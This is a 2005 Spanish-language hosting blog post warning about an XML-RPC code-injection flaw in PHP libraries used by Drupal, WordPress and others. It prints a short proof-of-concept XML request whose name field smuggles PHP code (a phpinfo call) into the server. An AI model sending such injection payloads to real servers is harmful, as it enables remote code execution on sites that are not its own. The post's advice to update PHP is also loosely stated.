Unico Blog sobre Servidores y Hosting

Hola :

Un bug de seguridad basado en una vulnerabilidad de xmlrpc ha sido el causante de numerosos ataques selectivos en Internet; este bug afecta los siguientes sistemas:

Drupal
Gentoo Linux
Mandriva Inc.
PEAR XML-RPC
phpMyFAQ
PHPXMLRPC
PostNuke
Trustix Secure Linux
Ubuntu Linux
WordPress
XOOPS

El bug permite a los atacantes ejecutar codigo php en el servidor donde esta alojada la pagina con la vulnerabilidad y bajo los privilegios del proceso que ejecuta la pagina PHP.

Una demostracion es la siguiente:

< ?xml version="1.0"?>
< methodcall >
< methodname >test.method< /methodname >
< params >
< param >
< value >< name >‘,'’)); phpinfo(); exit;/*< /name >< /value >
< /param >
< /params >

Se recomienda la actualizacion de la version de PHP como solucion.

Saludos

This entry was posted on Saturday, November 12th, 2005 at 9:28 pm and is filed under Seguridad Informatica. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.